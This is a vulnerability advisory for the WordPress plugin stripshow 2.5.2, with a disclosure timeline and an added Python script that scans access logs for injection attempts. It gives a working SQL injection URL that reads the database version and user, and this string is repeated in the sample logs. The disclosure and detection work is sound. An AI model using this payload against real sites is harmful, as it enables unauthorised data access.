Plugin Details
Plugin Name: wp-plugin : stripshow
Affected Version : 2.5.2 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
- December 28, 2013 : Vendor Contacted
- January 11, 2014 : Plugin No Change
- May 28, 2014 : Public Disclosure
Technical Details
http://localhost/wp-admin/admin.php?page=stripshow-storylines&action=edit&story=2%20union%20select%201,@@version,user(),4,5
Here the “story” parameter is susceptible to injection. However, the risk is limited because the request is only possible for administrators.
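Detection sketch (an added example, not part of the original advisory or the plugin's code): it scans web access logs for requests to the stripshow-storylines admin page whose “story” value is not a plain integer. The log lines are constructed samples, and the assumption that legitimate story ids are plain integers is inferred from the URL above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); line 2 carries
# the query string shown in the advisory, the rest are made up for the demo.
SAMPLE_LOG = """\
203.0.113.5 - admin [28/May/2014:10:01:02 +0000] "GET /wp-admin/admin.php?page=stripshow-storylines&action=edit&story=2 HTTP/1.1" 200 5120
203.0.113.5 - admin [28/May/2014:10:01:40 +0000] "GET /wp-admin/admin.php?page=stripshow-storylines&action=edit&story=2%20union%20select%201,@@version,user(),4,5 HTTP/1.1" 200 5301
198.51.100.7 - - [28/May/2014:10:02:11 +0000] "GET /wp-admin/admin.php?page=other-plugin&story=abc HTTP/1.1" 302 0
198.51.100.9 - admin [28/May/2014:10:03:00 +0000] "GET /wp-admin/admin.php?page=stripshow-storylines&action=edit&story=7&story=7%27 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate story id is a short run of decimal digits.
STORY_ID_RE = re.compile(r"[0-9]{1,10}")


def is_suspicious(target: str) -> bool:
    """True if the request targets the storylines page with a non-integer story."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return False
    # parse_qs URL-decodes values and keeps every occurrence of a repeated key.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "stripshow-storylines" not in params.get("page", []):
        return False
    return any(not STORY_ID_RE.fullmatch(v) for v in params.get("story", []))


def scan(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, request target) for every suspicious request."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append((lineno, m.group(1)))
    return hits


if __name__ == "__main__":
    for lineno, target in scan(SAMPLE_LOG):
        print(f"line {lineno}: {target}")
```

Only parameters sent in the URL reach the access log, so a value submitted in a POST body would need to be checked at the application or WAF layer instead.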